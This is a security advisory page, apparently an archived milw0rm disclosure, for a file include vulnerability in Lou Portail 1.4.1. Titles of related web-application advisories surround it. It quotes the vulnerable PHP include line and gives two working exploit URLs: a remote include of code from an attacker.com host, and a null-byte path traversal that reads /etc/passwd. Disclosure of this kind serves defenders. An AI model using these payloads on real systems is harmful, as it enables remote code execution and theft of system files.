Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Power Phlogger 2.0.9 Remote|Local File Include Vulnerability phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change From:mp01010_(at)_yahoo.com <mp01010_(at)_yahoo.com> Date:23.10.2006Subject:Lou Portail 1.4.1 Remote|Local File Include Vulnerability## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## # # # [ Lou Portail 1.4.1 ] # # # Class: Remote|Local File Include Vulnerability # # Patch: Unavailable # # Published 2006/10/18 # # Remote: Yes # Local: No # # Type: High # # Site: http://louportail.free.fr/ # # Author: MP # Contact: mp01010@yahoo.com # # # ################################################################# Vuln Code (admin/admin_module.php): <?... include ("$g_admin_rep/admin_utils.$g_ext"); ...?> #Vuln 1.0 -> require register_globals = On http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt #Vuln 2.0 -> require magic_quotes_gpc = Off http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../ ../../../../../../../../../../../../etc/passwd%00 # milw0rm.com [2006-10-20]
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Power Phlogger 2.0.9 Remote|Local File Include Vulnerability
phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability
Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability
Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change
